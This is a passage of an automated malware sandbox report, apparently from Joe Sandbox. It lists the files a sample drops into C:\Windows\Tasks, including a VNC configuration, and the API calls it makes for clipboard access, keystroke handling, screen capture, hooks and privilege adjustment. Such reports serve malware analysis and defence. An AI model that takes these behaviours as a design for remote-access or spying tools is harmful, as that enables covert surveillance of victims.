                            Source: C:\Users\user\Desktop\T8xrZb7nBL.exeCode function: 0_2_00408630 SetWindowsHookExW 00000002,Function_00008602,00000000,000000000_2_00408630
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 23_2_00007FF6C2BB13A0 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,23_2_00007FF6C2BB13A0
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 23_2_00007FF6C2BB13A0 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard | 23_2_00007FF6C2BB13A0
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 23_2_00007FF6C2B81DD0 OpenClipboard,EmptyClipboard,CloseClipboard,MultiByteToWideChar,GlobalAlloc,GlobalLock,MultiByteToWideChar,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,GlobalAlloc,CloseClipboard,GlobalLock,GlobalUnlock,SetClipboardData,GlobalFree,GlobalAlloc,CloseClipboard,GlobalLock,GlobalUnlock,SetClipboardData,GlobalFree,GlobalAlloc,CloseClipboard,GlobalLock,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard | 23_2_00007FF6C2B81DD0
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 27_2_00007FF6C2BB13A0 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard | 27_2_00007FF6C2BB13A0
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 27_2_00007FF6C2B81DD0 OpenClipboard,EmptyClipboard,CloseClipboard,MultiByteToWideChar,GlobalAlloc,GlobalLock,MultiByteToWideChar,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,GlobalAlloc,CloseClipboard,GlobalLock,GlobalUnlock,SetClipboardData,GlobalFree,GlobalAlloc,CloseClipboard,GlobalLock,GlobalUnlock,SetClipboardData,GlobalFree,GlobalAlloc,CloseClipboard,GlobalLock,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard | 27_2_00007FF6C2B81DD0
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 23_2_00007FF6C2B81AE0 OpenClipboard,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalSize,WideCharToMultiByte,WideCharToMultiByte,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalSize,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalSize,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalSize,GlobalUnlock,CloseClipboard | 23_2_00007FF6C2B81AE0
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 23_2_00007FF6C2BAF980 EnumDisplaySettingsA,LoadLibraryA,GetProcAddress,ReleaseDC,DeleteDC,CreateDCA,EnumDisplaySettingsA,FreeLibrary,EnumWindows,GetDC,CreateCompatibleDC,GetLastError,GetDeviceCaps,GetDeviceCaps,CreateCompatibleBitmap,GetLastError,GetDIBits,GetDIBits,GetDeviceCaps,InvalidateRect | 23_2_00007FF6C2BAF980
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 23_2_00007FF6C2BA31B0 GetKeyboardState | 23_2_00007FF6C2BA31B0
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 23_2_00007FF6C2B974C0 keybd_event,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetKeyState,TryEnterCriticalSection,LeaveCriticalSection,keybd_event | 23_2_00007FF6C2B974C0
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 27_2_00007FF6C2B974C0 keybd_event,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetKeyState,TryEnterCriticalSection,LeaveCriticalSection,keybd_event | 27_2_00007FF6C2B974C0
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 23_2_00007FF6C2B92E40 OpenSCManagerA,OpenServiceA,GetLastError,CloseServiceHandle,CloseServiceHandle,QueryServiceStatus,CloseServiceHandle,CloseServiceHandle,Sleep,DeleteService,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle | 23_2_00007FF6C2B92E40
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 23_2_00007FF6C2B91D10 WTSGetActiveConsoleSessionId,WTSGetActiveConsoleSessionId,CreateEnvironmentBlock,SetLastError,CreateProcessAsUserA,GetLastError,GetLastError,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,WTSGetActiveConsoleSessionId,Sleep,DestroyEnvironmentBlock,SetLastError,CreateProcessAsUserA,GetLastError,GetLastError,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,WTSGetActiveConsoleSessionId,Sleep,CloseHandle | 23_2_00007FF6C2B91D10
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 23_2_00007FF6C2B934B0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx | 23_2_00007FF6C2B934B0
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 23_2_00007FF6C2B93550 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetVersionExA,ExitWindowsEx | 23_2_00007FF6C2B93550
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 27_2_00007FF6C2B934B0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx | 27_2_00007FF6C2B934B0
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 27_2_00007FF6C2B93550 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetVersionExA,ExitWindowsEx | 27_2_00007FF6C2B93550
Source: C:\Windows\SysWOW64\cmd.exe | File created: C:\Windows\Tasks\3889122.Khe9oLY
Source: C:\Windows\SysWOW64\cmd.exe | File created: C:\Windows\Tasks\9655269573
Source: C:\Windows\SysWOW64\cmd.exe | File created: C:\Windows\Tasks\DygIR.vkc0f
Source: C:\Windows\SysWOW64\cmd.exe | File created: C:\Windows\Tasks\go3uE.OUJMA
Source: C:\Windows\SysWOW64\cmd.exe | File created: C:\Windows\Tasks\uqVb3.kkb9h
Source: C:\Windows\SysWOW64\cmd.exe | File created: C:\Windows\Tasks\Xv6Ya.d8LhT
Source: C:\Windows\SysWOW64\cmd.exe | File created: C:\Windows\Tasks\9655269573.cmd
Source: C:\Windows\SysWOW64\cmd.exe | File created: C:\Windows\Tasks\3889122.cmd
Source: C:\Windows\SysWOW64\cmd.exe | File created: C:\Windows\Tasks\browser_sn.exe
Source: C:\Windows\SysWOW64\cmd.exe | File created: C:\Windows\Tasks\UltraVNC.ini
Source: C:\Windows\SysWOW64\cmd.exe | File created: C:\Windows\Tasks\conhost.exe
Source: C:\Users\user\Desktop\T8xrZb7nBL.exe | Code function: 0_2_00405721 | 0_2_00405721
Source: C:\Users\user\Desktop\T8xrZb7nBL.exe | Code function: 0_2_004139D1 | 0_2_004139D1
Source: C:\Users\user\Desktop\T8xrZb7nBL.exe | Code function: 0_2_00413AAB | 0_2_00413AAB
Source: C:\Users\user\Desktop\T8xrZb7nBL.exe | Code function: 0_2_00413370 | 0_2_00413370
Source: C:\Users\user\Desktop\T8xrZb7nBL.exe | Code function: 0_2_00413D43 | 0_2_00413D43
Source: C:\Users\user\Desktop\T8xrZb7nBL.exe | Code function: 0_2_0040AD30 | 0_2_0040AD30
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 23_2_00007FF6C2BA36D0 | 23_2_00007FF6C2BA36D0
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 23_2_00007FF6C2B94C10 | 23_2_00007FF6C2B94C10
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 23_2_00007FF6C2C3E400 | 23_2_00007FF6C2C3E400
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 23_2_00007FF6C2BAA420 | 23_2_00007FF6C2BAA420
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 23_2_00007FF6C2BA6BBD | 23_2_00007FF6C2BA6BBD
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 23_2_00007FF6C2B9B3D0 | 23_2_00007FF6C2B9B3D0
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 23_2_00007FF6C2B993E0 | 23_2_00007FF6C2B993E0
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 23_2_00007FF6C2B87BE2 | 23_2_00007FF6C2B87BE2
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 23_2_00007FF6C2B9BB80 | 23_2_00007FF6C2B9BB80
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 23_2_00007FF6C2B97B90 | 23_2_00007FF6C2B97B90
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 23_2_00007FF6C2B84390 | 23_2_00007FF6C2B84390
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 23_2_00007FF6C2BA739B | 23_2_00007FF6C2BA739B
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 23_2_00007FF6C2B87BA6 | 23_2_00007FF6C2B87BA6
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 23_2_00007FF6C2B87B37 | 23_2_00007FF6C2B87B37
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 23_2_00007FF6C2B87B71 | 23_2_00007FF6C2B87B71
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 23_2_00007FF6C2B91D10 | 23_2_00007FF6C2B91D10
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 23_2_00007FF6C2B9AD30 | 23_2_00007FF6C2B9AD30
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 23_2_00007FF6C2BA2CC0 | 23_2_00007FF6C2BA2CC0
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 23_2_00007FF6C2BB1CE0 | 23_2_00007FF6C2BB1CE0
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 23_2_00007FF6C2BADCF0 | 23_2_00007FF6C2BADCF0
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 23_2_00007FF6C2B8DCF0 | 23_2_00007FF6C2B8DCF0
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 23_2_00007FF6C2C48C90 | 23_2_00007FF6C2C48C90
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 23_2_00007FF6C2BB54A0 | 23_2_00007FF6C2BB54A0
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 23_2_00007FF6C2BB5CA0 | 23_2_00007FF6C2BB5CA0
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 23_2_00007FF6C2BB3460 | 23_2_00007FF6C2BB3460
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 23_2_00007FF6C2C42C70 | 23_2_00007FF6C2C42C70
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 23_2_00007FF6C2B84200 | 23_2_00007FF6C2B84200
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 23_2_00007FF6C2B87A1C | 23_2_00007FF6C2B87A1C
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 23_2_00007FF6C2BA5A33 | 23_2_00007FF6C2BA5A33
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 23_2_00007FF6C2BA51B7 | 23_2_00007FF6C2BA51B7
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 23_2_00007FF6C2B8E1D0 | 23_2_00007FF6C2B8E1D0
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 23_2_00007FF6C2C409F0 | 23_2_00007FF6C2C409F0
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 23_2_00007FF6C2B879E9 | 23_2_00007FF6C2B879E9
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 23_2_00007FF6C2BAF980 | 23_2_00007FF6C2BAF980
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 23_2_00007FF6C2B98980 | 23_2_00007FF6C2B98980
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 23_2_00007FF6C2B881AD | 23_2_00007FF6C2B881AD
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 23_2_00007FF6C2BAD150 | 23_2_00007FF6C2BAD150
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 23_2_00007FF6C2B85170 | 23_2_00007FF6C2B85170
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 23_2_00007FF6C2B87B04 | 23_2_00007FF6C2B87B04
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 23_2_00007FF6C2BAAB10 | 23_2_00007FF6C2BAAB10
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 23_2_00007FF6C2BB0330 | 23_2_00007FF6C2BB0330
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 23_2_00007FF6C2BAC2C0 | 23_2_00007FF6C2BAC2C0
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 23_2_00007FF6C2BF12C0 | 23_2_00007FF6C2BF12C0
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 23_2_00007FF6C2B87ACF | 23_2_00007FF6C2B87ACF
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 23_2_00007FF6C2B83A90 | 23_2_00007FF6C2B83A90
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 23_2_00007FF6C2B87A9A | 23_2_00007FF6C2B87A9A
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 23_2_00007FF6C2BA623E | 23_2_00007FF6C2BA623E
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 23_2_00007FF6C2C37250 | 23_2_00007FF6C2C37250
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 23_2_00007FF6C2B87A5B | 23_2_00007FF6C2B87A5B
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 23_2_00007FF6C2BA8A70 | 23_2_00007FF6C2BA8A70
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 23_2_00007FF6C2B90270 | 23_2_00007FF6C2B90270
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 23_2_00007FF6C2B82270 | 23_2_00007FF6C2B82270
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 23_2_00007FF6C2B8C810 | 23_2_00007FF6C2B8C810
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 23_2_00007FF6C2BAE780 | 23_2_00007FF6C2BAE780
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 23_2_00007FF6C2C3DF80 | 23_2_00007FF6C2C3DF80
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 23_2_00007FF6C2B99740 | 23_2_00007FF6C2B99740
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 23_2_00007FF6C2B9AF60 | 23_2_00007FF6C2B9AF60
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 23_2_00007FF6C2B83770 | 23_2_00007FF6C2B83770
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 23_2_00007FF6C2B91100 | 23_2_00007FF6C2B91100
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 23_2_00007FF6C2B8A910 | 23_2_00007FF6C2B8A910
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 23_2_00007FF6C2B96930 | 23_2_00007FF6C2B96930
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 23_2_00007FF6C2B9A130 | 23_2_00007FF6C2B9A130
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 23_2_00007FF6C2B9C8D0 | 23_2_00007FF6C2B9C8D0
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 23_2_00007FF6C2B920E0 | 23_2_00007FF6C2B920E0
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 23_2_00007FF6C2B81880 | 23_2_00007FF6C2B81880
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 23_2_00007FF6C2B9A890 | 23_2_00007FF6C2B9A890
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 23_2_00007FF6C2B9C090 | 23_2_00007FF6C2B9C090
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 23_2_00007FF6C2B970B0 | 23_2_00007FF6C2B970B0
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 23_2_00007FF6C2BAA870 | 23_2_00007FF6C2BAA870
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 23_2_00007FF6C2B98E10 | 23_2_00007FF6C2B98E10
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 23_2_00007FF6C2B9E610 | 23_2_00007FF6C2B9E610
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 23_2_00007FF6C2BB3E20 | 23_2_00007FF6C2BB3E20
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 23_2_00007FF6C2BA1620 | 23_2_00007FF6C2BA1620
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 23_2_00007FF6C2BA6DD1 | 23_2_00007FF6C2BA6DD1
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 23_2_00007FF6C2B81DD0 | 23_2_00007FF6C2B81DD0
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 23_2_00007FF6C2BA4D7E | 23_2_00007FF6C2BA4D7E
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 23_2_00007FF6C2B98590 | 23_2_00007FF6C2B98590
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 23_2_00007FF6C2B9C5B0 | 23_2_00007FF6C2B9C5B0
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 23_2_00007FF6C2C4068C | 23_2_00007FF6C2C4068C
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 23_2_00007FF6C2B84E80 | 23_2_00007FF6C2B84E80
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 23_2_00007FF6C2BA2650 | 23_2_00007FF6C2BA2650
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 23_2_00007FF6C2BD0650 | 23_2_00007FF6C2BD0650
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 23_2_00007FF6C2BB1660 | 23_2_00007FF6C2BB1660
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 23_2_00007FF6C2BAAE70 | 23_2_00007FF6C2BAAE70
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 27_2_00007FF6C2B94C10 | 27_2_00007FF6C2B94C10
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 27_2_00007FF6C2C3E400 | 27_2_00007FF6C2C3E400
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 27_2_00007FF6C2BAA420 | 27_2_00007FF6C2BAA420
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 27_2_00007FF6C2BA6BBD | 27_2_00007FF6C2BA6BBD
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 27_2_00007FF6C2B9B3D0 | 27_2_00007FF6C2B9B3D0
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 27_2_00007FF6C2B993E0 | 27_2_00007FF6C2B993E0
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 27_2_00007FF6C2B87BE2 | 27_2_00007FF6C2B87BE2
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 27_2_00007FF6C2B9BB80 | 27_2_00007FF6C2B9BB80
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 27_2_00007FF6C2B97B90 | 27_2_00007FF6C2B97B90
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 27_2_00007FF6C2B84390 | 27_2_00007FF6C2B84390
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 27_2_00007FF6C2BA739B | 27_2_00007FF6C2BA739B
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 27_2_00007FF6C2B87BA6 | 27_2_00007FF6C2B87BA6
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 27_2_00007FF6C2B87B37 | 27_2_00007FF6C2B87B37
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 27_2_00007FF6C2B87B71 | 27_2_00007FF6C2B87B71
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 27_2_00007FF6C2B91D10 | 27_2_00007FF6C2B91D10
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 27_2_00007FF6C2B9AD30 | 27_2_00007FF6C2B9AD30
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 27_2_00007FF6C2BB1CE0 | 27_2_00007FF6C2BB1CE0
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 27_2_00007FF6C2BADCF0 | 27_2_00007FF6C2BADCF0
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 27_2_00007FF6C2B8DCF0 | 27_2_00007FF6C2B8DCF0
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 27_2_00007FF6C2C48C90 | 27_2_00007FF6C2C48C90
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 27_2_00007FF6C2BB54A0 | 27_2_00007FF6C2BB54A0
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 27_2_00007FF6C2BB5CA0 | 27_2_00007FF6C2BB5CA0
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 27_2_00007FF6C2BB3460 | 27_2_00007FF6C2BB3460
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 27_2_00007FF6C2C42C70 | 27_2_00007FF6C2C42C70
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 27_2_00007FF6C2B84200 | 27_2_00007FF6C2B84200
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 27_2_00007FF6C2B87A1C | 27_2_00007FF6C2B87A1C
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 27_2_00007FF6C2BA5A33 | 27_2_00007FF6C2BA5A33
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 27_2_00007FF6C2BA51B7 | 27_2_00007FF6C2BA51B7
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 27_2_00007FF6C2B8E1D0 | 27_2_00007FF6C2B8E1D0
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 27_2_00007FF6C2C409F0 | 27_2_00007FF6C2C409F0
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 27_2_00007FF6C2B879E9 | 27_2_00007FF6C2B879E9
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 27_2_00007FF6C2BAF980 | 27_2_00007FF6C2BAF980
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 27_2_00007FF6C2B98980 | 27_2_00007FF6C2B98980
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 27_2_00007FF6C2B881AD | 27_2_00007FF6C2B881AD
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 27_2_00007FF6C2BAD150 | 27_2_00007FF6C2BAD150
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 27_2_00007FF6C2B85170 | 27_2_00007FF6C2B85170
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 27_2_00007FF6C2B87B04 | 27_2_00007FF6C2B87B04
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 27_2_00007FF6C2BAAB10 | 27_2_00007FF6C2BAAB10
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 27_2_00007FF6C2BB0330 | 27_2_00007FF6C2BB0330
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 27_2_00007FF6C2BAC2C0 | 27_2_00007FF6C2BAC2C0
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 27_2_00007FF6C2BF12C0 | 27_2_00007FF6C2BF12C0
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 27_2_00007FF6C2B87ACF | 27_2_00007FF6C2B87ACF
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 27_2_00007FF6C2B83A90 | 27_2_00007FF6C2B83A90
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 27_2_00007FF6C2B87A9A | 27_2_00007FF6C2B87A9A
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 27_2_00007FF6C2BA623E | 27_2_00007FF6C2BA623E
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 27_2_00007FF6C2C37250 | 27_2_00007FF6C2C37250
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 27_2_00007FF6C2B87A5B | 27_2_00007FF6C2B87A5B
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 27_2_00007FF6C2BA8A70 | 27_2_00007FF6C2BA8A70
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 27_2_00007FF6C2B90270 | 27_2_00007FF6C2B90270
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 27_2_00007FF6C2B82270 | 27_2_00007FF6C2B82270
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 27_2_00007FF6C2B8C810 | 27_2_00007FF6C2B8C810
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 27_2_00007FF6C2BAE780 | 27_2_00007FF6C2BAE780
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 27_2_00007FF6C2C3DF80 | 27_2_00007FF6C2C3DF80
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 27_2_00007FF6C2B99740 | 27_2_00007FF6C2B99740
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 27_2_00007FF6C2B9AF60 | 27_2_00007FF6C2B9AF60
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 27_2_00007FF6C2B83770 | 27_2_00007FF6C2B83770
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 27_2_00007FF6C2B91100 | 27_2_00007FF6C2B91100
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 27_2_00007FF6C2B8A910 | 27_2_00007FF6C2B8A910
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 27_2_00007FF6C2B96930 | 27_2_00007FF6C2B96930
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 27_2_00007FF6C2B9A130 | 27_2_00007FF6C2B9A130
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 27_2_00007FF6C2B9C8D0 | 27_2_00007FF6C2B9C8D0
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 27_2_00007FF6C2B920E0 | 27_2_00007FF6C2B920E0
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 27_2_00007FF6C2B81880 | 27_2_00007FF6C2B81880
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 27_2_00007FF6C2B9A890 | 27_2_00007FF6C2B9A890
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 27_2_00007FF6C2B9C090 | 27_2_00007FF6C2B9C090
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 27_2_00007FF6C2B970B0 | 27_2_00007FF6C2B970B0
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 27_2_00007FF6C2BAA870 | 27_2_00007FF6C2BAA870
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 27_2_00007FF6C2B98E10 | 27_2_00007FF6C2B98E10
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 27_2_00007FF6C2B9E610 | 27_2_00007FF6C2B9E610
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 27_2_00007FF6C2BB3E20 | 27_2_00007FF6C2BB3E20
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 27_2_00007FF6C2BA1620 | 27_2_00007FF6C2BA1620
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 27_2_00007FF6C2BA6DD1 | 27_2_00007FF6C2BA6DD1
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 27_2_00007FF6C2B81DD0 | 27_2_00007FF6C2B81DD0
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 27_2_00007FF6C2BA2DF3 | 27_2_00007FF6C2BA2DF3
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 27_2_00007FF6C2BA4D7E | 27_2_00007FF6C2BA4D7E
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 27_2_00007FF6C2B98590 | 27_2_00007FF6C2B98590
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 27_2_00007FF6C2B9C5B0 | 27_2_00007FF6C2B9C5B0
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 27_2_00007FF6C2BA36D0 | 27_2_00007FF6C2BA36D0
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 27_2_00007FF6C2C4068C | 27_2_00007FF6C2C4068C
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 27_2_00007FF6C2B84E80 | 27_2_00007FF6C2B84E80
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 27_2_00007FF6C2BA2650 | 27_2_00007FF6C2BA2650
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 27_2_00007FF6C2BD0650 | 27_2_00007FF6C2BD0650
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 27_2_00007FF6C2BB1660 | 27_2_00007FF6C2BB1660
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 27_2_00007FF6C2BAAE70 | 27_2_00007FF6C2BAAE70
Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Xv6Ya.d8LhT F7D4080AD8259B0AAC2504F8B5D8FAB18E5124321C442C8BCB577598059D0B24
Source: C:\Users\user\Desktop\T8xrZb7nBL.exe | Code function: String function: 004026B0 appears 38 times
Source: C:\Windows\Tasks\browser_sn.exe | Code function: String function: 00007FF6C2B8AE30 appears 34 times
Source: C:\Windows\Tasks\browser_sn.exe | Code function: String function: 00007FF6C2BEA3B0 appears 38 times
Source: C:\Windows\Tasks\browser_sn.exe | Code function: String function: 00007FF6C2C37C50 appears 60 times
Source: C:\Windows\Tasks\browser_sn.exe | Code function: String function: 00007FF6C2C39500 appears 42 times
Source: C:\Windows\Tasks\browser_sn.exe | Code function: String function: 00007FF6C2B83730 appears 730 times
Source: C:\Windows\Tasks\browser_sn.exe | Code function: String function: 00007FF6C2C370B4 appears 56 times
Source: Xv6Ya.d8LhT.0.dr | Static PE information: Resource name: JAVAARCHIVE type: Zip archive data, at least v2.0 to extract, compression method=deflate
